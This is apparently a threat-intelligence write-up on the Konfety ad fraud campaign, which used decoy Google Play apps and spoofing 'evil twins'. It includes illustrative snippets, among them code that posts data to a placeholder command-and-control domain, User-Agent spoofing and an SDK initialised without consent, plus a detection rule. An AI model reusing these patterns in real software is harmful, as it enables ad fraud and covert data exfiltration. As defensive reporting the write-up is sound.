Uncover the Konfety ad fraud scheme using 250+ decoy apps on Google Play. Learn how malicious twins operated and the steps taken to mitigate the threat.

Continue reading
The Konfety mobile ad fraud campaign, disrupted by HUMAN’s Satori Threat Intelligence and Research Team, marks a significant milestone in the battle against mobile advertising fraud. This Threatfeed analysis meticulously dissects the complex mechanisms, techniques, and infrastructure employed by the threat actors.
The Konfety campaign, named after the Russian word for candy, involved an advertising SDK called CaramelAds. The threat actors created over 250 decoy applications on the Google Play Store, which appeared legitimate. These decoy apps were used to camouflage their malicious counterparts, known as "evil twins."
The evil twins spoofed the app IDs and advertising publisher IDs of the decoy apps. This obfuscation technique made it challenging to distinguish malicious traffic from legitimate traffic. Both decoy and evil twin apps operated on the same infrastructure, facilitating large-scale fraud.
At its peak, the Konfety campaign generated up to 10 billion fraudulent bid requests per day. This scale of operation affected multiple entities across the advertising ecosystem, including ad networks and developers unknowingly using the CaramelAds SDK.
The threat actors manipulated the CaramelAds SDK to create stripped-down versions without GDPR consent mechanisms. This allowed the evil twins to generate fraudulent ad impressions without user consent. The SDK was downloaded in a second stage after the app was set up, bypassing initial security checks.
// Initialize CaramelAds SDK without GDPR consent
CaramelAds.initialize({
consent: false,
trackingEnabled: true
});The evil twin apps used different domains for command-and-control (C2) communications. These domains were often hosted on the same IP address as the CaramelAds infrastructure, ensuring seamless communication and control.
import requests
# Sending data to C2 server
def send_data_to_c2(data):
c2_url = "http://malicious-c2-domain.com/api/receive"
response = requests.post(c2_url, json=data)
return response.status_codeThe Konfety actors used malvertising and click-baiting to distribute the evil twin apps. Users were tricked into downloading these apps via compromised domains, WordPress sites, Docker Hub, Facebook, Google Sites, and OpenSea.
<!-- Malicious URL redirection -->
<a href="http://compromised-domain.com/download-evil-twin">
Download the latest APK
</a>The evil twins employed various techniques to evade detection. They modified traffic to appear as though it originated from legitimate devices, opened URLs using the device browser, and bypassed validation checks typically present in well-established networks.
// Modify traffic to mimic legitimate device
public class TrafficModifier {
public static void modifyTraffic(Request request) {
request.addHeader("User-Agent", "LegitimateDevice/1.0");
// Additional modifications
}
}The Konfety campaign's primary objective was to generate fraudulent ad impressions. The evil twins displayed out-of-context ads, often full-screen and hard to escape, hijacking user interactions and exploiting notifications.
// Display full-screen ads
fun displayFullScreenAd(context: Context) {
val ad = FullScreenAd(context)
ad.loadAd("http://ad-network.com/get-ad")
ad.show()
}The fraudulent activities resulted in significant revenue losses for advertisers and ad networks. The large volume of fake bid requests inflated costs and reduced the effectiveness of legitimate advertising campaigns.
Upon identifying the Konfety activity, HUMAN’s Satori Threat Intelligence team flagged high-confidence traffic from the malicious applications. They implemented countermeasures to protect their customers, observing adaptations in the targeted ad networks.
Google Play Protect played a crucial role in warning users and disabling apps identified as "evil twins." This proactive monitoring helped mitigate the spread and impact of the Konfety campaign.
The HUMAN Satori team developed signatures for the Konfety scheme, enabling the detection and blocking of fraudulent activities. These signatures were shared with external partners, contributing to a substantial decrease in fraudulent bid requests.
# Signature for detecting Konfety scheme
rules:
- id: konfety-detection
description: Detects traffic patterns of Konfety campaign
conditions:
- traffic_pattern:
src_ip: "malicious-ip"
dst_port: 443
protocol: "HTTPS"
148 malicious npm packages masquerading as student proxy and school Wi-Fi bypass tools. Rather than compromising developers during installation